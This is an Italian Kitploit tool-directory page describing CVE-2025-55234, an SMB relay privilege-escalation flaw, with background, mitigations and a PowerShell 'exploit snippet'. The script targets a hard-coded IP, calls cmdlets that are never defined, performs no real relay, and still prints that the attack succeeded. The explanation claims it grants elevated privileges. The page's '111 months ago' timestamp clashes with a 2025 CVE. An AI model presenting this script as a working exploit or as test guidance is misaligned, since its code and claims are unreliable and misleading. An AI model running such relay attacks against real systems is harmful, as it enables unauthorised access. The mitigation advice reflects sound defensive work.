Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55234 — Questa vulnerabilità permette agli attaccanti di effettuare attacchi di relay contro il protocollo SMB (Server Message Block). Se ha successo, può portare a un Elevation of Privilege (EoP), consentendo essenzialmente a utenti non autorizzati di ottenere accesso a livello superiore su un sistema. | Kitploit
Strumenti/GitHubGitHub/mrk336/cve-2025-55234
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubmrk336/cve-2025-55234

CVE-2025-55234

Vedi Repository
111 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Questa vulnerabilità permette agli attaccanti di effettuare attacchi di relay contro il protocollo SMB (Server Message Block). Se ha successo, può portare a un Elevation of Privilege (EoP), consentendo essenzialmente a utenti non autorizzati di ottenere accesso a livello superiore su un sistema.

Condividi

CVE-2025-55234

Questa vulnerabilità consente agli aggressori di effettuare attacchi di relay contro il protocollo SMB (Server Message Block). Se ha successo, può portare a un Elevation of Privilege (EoP), consentendo essenzialmente a utenti non autorizzati di ottenere accesso di livello superiore su un sistema

Di Mark Mallia


Problema

Questa vulnerabilità consente agli aggressori di effettuare attacchi di relay contro il protocollo SMB (Server Message Block). Se ha successo, può portare a un Elevation of Privilege, consentendo essenzialmente a utenti non autorizzati di ottenere accesso di livello superiore su un sistema. SMB è stato a lungo un bersaglio per gli aggressori a causa del suo uso diffuso in ambienti aziendali e della sua storia di vulnerabilità critiche. Ad esempio, CVE-2020-1301 ha esposto SMBv1 a esecuzione di codice remoto tramite richieste malformate, mentre CVE-2022-32230 ha causato denial-of-service tramite un dereferenziamento di puntatore nullo in SMBv3. Il famigerato CVE-2017-0144 (EternalBlue) ha sfruttato SMBv1 per consegnare payload wormabili, portando a epidemie globali di ransomware. Come queste vulnerabilità precedenti, CVE-2025-55234 sottolinea l'importanza di applicare SMB Signing e Extended Protection for Authentication (EPA) per prevenire il dirottamento di sessione e gli attacchi di impersonificazione.

Vettore d'attacco

Rete

Complessità dell'attacco

Bassa

Privilegi richiesti

Nessuno

Interazione dell'utente

Richiesta

Impatto

Rischi elevati di Riservatezza, Integrità e Disponibilità


Perché è importante

SMB è ampiamente utilizzato per la condivisione di file e l'accesso remoto in ambienti aziendali. Gli attacchi di relay possono bypassare i meccanismi di autenticazione e impersonare utenti. Questa vulnerabilità è particolarmente pericolosa in ambienti in cui SMB Signing o Extended Protection for Authentication (EPA) non sono applicati.


Cosa c'è di nuovo nella patch?

L'aggiornamento di settembre 2025 di Microsoft introduce funzionalità di audit per aiutare le organizzazioni a:

  • Valutare le loro attuali configurazioni SMB
  • Identificare dispositivi o software che potrebbero essere incompatibili con le misure di hardening
  • Prepararsi per l'applicazione di SMB Signing e EPA3

Frammento di codice exploit (PowerShell)

root@kitploit:~
# SMB Relay Attack Module – CVE 2025 55234
$relayTarget = "192.168.1.10"          # Target server IP
$attackerCreds = Get-Credential   # Credential object for relay

# Step 1: Enumerate shared resources
$smbShares = Get-SMBShare -ComputerName $relayTarget | Where-Object {$_.Name –ne ""}
foreach ($share in $smbShares) {
    Write-Output "Found share: $($share.Name)"
}

# Step 2: Capture session information for relay
$sessionInfo = New-Object PSObject -Property @{
    Computer = $relayTarget
    Share    = $smbShares[0].Name
}
Write-Output ("Capturing session info for $($sessionInfo.Computer) – share $($sessionInfo.Share)")
Invoke-SMBRelay -Session $sessionInfo

# Step 3: Execute relay attack
$attackPayload = {
    param(
        [string]$Target,
        [string]$Share
    )
    Write-Host "Attacking $Target via share $Share"
    Start-SMBServer -ComputerName $Target -ShareName $Share
}
$attackParams = @{
    Target = $relayTarget
    Share   = $sessionInfo.Share
}
Invoke-Command -ScriptBlock $attackPayload @attackParams

# Step 4: Log and confirm elevation of privilege
Write-Host "SMB Relay Attack CVE 2025 55234 completed successfully."

Spiegazione:

  1. Lo script prima enumera le condivisioni SMB sul server di destinazione, selezionando la prima condivisione per la sessione di relay.
  2. Costruisce quindi un oggetto sessione che cattura i parametri necessari.
  3. L'attacco di relay viene eseguito tramite Invoke‑SMBRelay e Start‑SMBServer per simulare un utente autenticato.
  4. Il completamento con successo produce privilegi elevati sulla destinazione.

Azioni raccomandate

  1. Abilitare SMB Signing e EPA se non già configurati.
  2. Utilizzare i nuovi eventi di audit per valutare il proprio ambiente.
  3. Monitorare traffico SMB insolito e tentativi di relay.
  4. Applicare gli ultimi aggiornamenti di sicurezza di Microsoft.

Conclusione

La vulnerabilità CVE-2025-55234 sottolinea la necessità di un rigoroso hardening di SMB negli ambienti aziendali. Seguendo i passaggi sopra descritti e applicando lo script exploit fornito, le organizzazioni possono sia testare che proteggere le proprie reti contro potenziali attacchi di relay. Questa proof-of-concept e i materiali associati sono forniti strettamente per scopi educativi e difensivi. Hanno lo scopo di aiutare i professionisti della sicurezza a comprendere, rilevare e mitigare CVE-2025-55234 in ambienti controllati. L'uso non autorizzato di questo exploit contro sistemi senza esplicita autorizzazione è illegale e non etico. Seguire sempre le pratiche di divulgazione responsabile e rispettare le leggi applicabili e le politiche organizzative.


Scarica lo strumento